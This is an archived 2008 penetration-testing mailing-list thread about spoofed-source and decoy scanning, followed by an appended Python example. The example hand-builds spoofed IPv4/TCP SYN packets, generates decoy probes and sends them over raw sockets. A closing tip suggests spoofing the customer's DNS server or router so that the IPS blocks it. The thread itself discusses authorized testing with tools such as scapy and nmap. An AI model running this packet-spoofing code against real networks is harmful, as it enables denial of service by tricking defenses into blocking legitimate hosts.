Re: Tool for sending malicious traffic to destination system

From: Kish Pent (kish_pent@yahoo.com)
Date: Fri Jan 04 2008 - 05:10:56 EST


Hey Ravi,

Hope you got the basic idea: you need a tool like
scapy for packet-crafting attacks; you can't do much
with nmap for packet crafting, even though you're
mentioning a new word now... spoofing with nmap is
possible using the -S option. Basically, stop using
automated tools like Nessus for a penetration test.

Nessus is recommended if you're on a pen-test with a
considerable amount of machines. I've seen a lot of
people misunderstand this and use Nessus in web pen-tests
with all options enabled (SQL injection checks and other
relevant checks are enough).

If you want to check what device is sitting in between
you and the target, do some network device testing
using tools like yersinia or fragroute. You can
of course use scapy very well, provided you know some
Python scripting.

There's a considerable amount of things that must be
in place to get things right. For now I'll conclude
by saying "don't use Nessus" for one host or two
hosts; use other tools like amap, nmap and firewalk
in conjunction with Nessus, or use them inside Nessus
(the results or just the tool itself).

There's a book on Nessus called Nessus Network
Auditing, from Syngress, while you can alternately read
their documentation. If your goal is to spoof, just
spoof; don't scan with Nessus or Nmap.

If you're in doubt, refer to the nmap documentation
here about Firewall / IDS evasion.
http://insecure.org/nmap/man/man-bypass-firewalls-ids.html

Cheers :)
Kish

--- Rolando Ruiz <jayro2809@gmail.com> wrote:

> Would bouncing the scan off a, say, FTP server do what you want it to? All
> you're looking to do is make it seem as if it's coming from another host,
> right?
>
> On Dec 31, 2007 12:29 AM, Ravi <whitehaat@gmail.com>
> wrote:
>
> >
> > Hi Kish & list,
> >
> > I'm kinda looking to do decoy scanning with traffic similar to Nessus.
> > I understand I can't do decoy scanning with Nessus. So if there is a
> > tool that could send malicious traffic like Nessus to my target, that
> > would be it!!! I'm basically trying to test a network that blocks my IP
> > when I scan with Nessus. I want to prove to the customer that I can
> > spoof a source IP that would be blocked by your IPS, leading to a DoS
> > issue.
> >
> > Thanks.
> >
> > Kish Pent wrote:
> > > Hey,
> > >
> > > You must define what you mean by malicious traffic before crafting
> > > it, based on which the tool can be selected. Your aim is to send
> > > malformed packets, which in other words you're trying to interpret as
> > > malicious traffic. By the way, nmap is no example for sending
> > > malicious traffic. Scapy is a very good packet-crafting tool, and it
> > > can be used for subsequent port scanning, protocol analysis, and best
> > > of all, it's just THE tool for packets. (It can do what hping can do
> > > for you; it can do what nmap, unicornscan or some other tools can do
> > > for you.)
> > >
> > > You might also want to check out the www.secdev.org website. Philippe
> > > Biondi from EADS has written the tool, and given some excellent docs
> > > and ppt(s) out there.
> > >
> > > Cheers :)
> > > Kish
> > >
> > > --- Ravi <whitehaat@gmail.com> wrote:
> > >
> > >
> > >> Hi guys...
> > >>
> > >> Can anybody help me in finding a tool like 'nmap -D (decoy)' which can
> > >> send some malicious content to a system...
> > >>
> > >> Thanks & Regards,
> > >>
> > >> Whitehaat
> > >
> > > --
> > > Kishore, Penetration Tester,
> > > 17/1,Upstairs,Sarojini St,
> > > Smart Security, T.Nagar,
> > > Chennai - 600 017
> > >
> > > Phone: 91 98841 80767

--
Kishore, Penetration Tester,
17/1,Upstairs,Sarojini St,
Smart Security, T.Nagar, 
Chennai - 600 017
Phone: 91 98841 80767
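Added example, not code from anyone in this thread: what `nmap -S` / `nmap -D`, or a one-liner like scapy's `send(IP(src=...)/TCP(flags="S"))`, actually put on the wire. The IPv4 and TCP headers are built by hand so you can see that nothing in a SYN probe ties it to the real sender; an IPS that auto-blocks on source address has no way to tell the decoy from the real host, which is the denial-of-service Ravi wants to demonstrate. All addresses are constructed RFC 5737 documentation addresses; the port numbers, `decoy_probes` and `send_raw` are this example's own names. Sending needs root or CAP_NET_RAW, authorization for the target network, and an upstream that does not drop spoofed sources (BCP 38 egress filtering will). Replies to a spoofed SYN go to the spoofed host, so you will see nothing come back; that is expected.

```python
"""Hand-built IPv4/TCP SYN probes with a spoofed or decoy source address."""
import random
import socket
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (odd tail zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_syn(src_ip: str, dst_ip: str, sport: int, dport: int, seq=None) -> bytes:
    """Return a raw 40-byte IPv4+TCP SYN whose source address is whatever we say."""
    if seq is None:
        seq = random.getrandbits(32)
    src = socket.inet_aton(src_ip)
    dst = socket.inet_aton(dst_ip)
    # TCP: sport, dport, seq, ack, data offset (5 words), flags=SYN, window, csum=0, urg
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    # TCP checksum covers a pseudo-header with the (spoofed) source address
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4: ver/ihl, tos, total length, id, DF, ttl, proto, csum=0, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), random.getrandbits(16),
                     0x4000, 64, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def ipv4_src(pkt: bytes) -> str:
    """Source address as the receiving IPS sees it: bytes 12..15 of the IP header."""
    return socket.inet_ntoa(pkt[12:16])


def checksums_valid(pkt: bytes) -> bool:
    """A correct header sums to zero when the checksum field is included."""
    ip_ok = checksum(pkt[:20]) == 0
    tcp = pkt[20:]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    return ip_ok and checksum(pseudo + tcp) == 0


def decoy_probes(real_ip: str, decoys, dst_ip: str, dport: int, sport=40000, rng=random):
    """Like nmap -D: one SYN per decoy plus the real host, in random order.

    Returns (source_ip, packet) pairs; every packet is byte-for-byte as
    plausible as the real one, so a source-IP block list cannot separate them.
    """
    sources = list(decoys) + [real_ip]
    rng.shuffle(sources)
    return [(s, build_syn(s, dst_ip, sport, dport)) for s in sources]


def send_raw(pkt: bytes, dst_ip: str) -> None:
    """Transmit with our own IP header (IP_HDRINCL). Needs CAP_NET_RAW/root."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    try:
        s.sendto(pkt, (dst_ip, 0))
    finally:
        s.close()


if __name__ == "__main__":
    # Constructed addresses (RFC 5737); build only, no packets leave this host.
    for src, pkt in decoy_probes("192.0.2.10", ["192.0.2.20", "192.0.2.30"],
                                 "198.51.100.5", 80):
        print(src, len(pkt), "bytes, checksums ok:", checksums_valid(pkt))
```

The practical check before claiming the DoS: send one probe with a decoy source you control, then watch that the IPS blocks the decoy rather than you. If it blocks the decoy, the same packet with the customer's DNS or upstream router as `src_ip` is the finding; send it only with written permission, because the block is real.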


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:18 EDT